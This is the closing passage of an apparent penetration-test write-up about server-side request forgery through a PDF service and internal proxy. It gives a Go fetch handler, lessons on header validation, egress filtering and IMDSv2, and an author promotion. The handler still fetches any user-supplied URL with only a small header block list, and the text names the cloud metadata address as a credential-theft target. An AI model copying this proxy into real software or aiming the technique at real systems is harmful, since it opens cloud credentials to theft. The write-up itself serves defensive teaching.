        req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        // Only set whitelisted headers if necessary, or pass none from user input.
        // For this example, we'll assume the pdf-gen-svc has already sanitized them.
        for k, v := range requestBody.Headers {
            // Explicitly block sensitive headers from being set by user input on the proxy
            if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
                continue // Do not allow these to be set by user
            }
            req.Header.Set(k, v)
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
            }
        defer resp.Body.Close()
    
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    

    This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

    • Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
    • The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
    • Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
    • AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
    • Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.

    Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

    Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗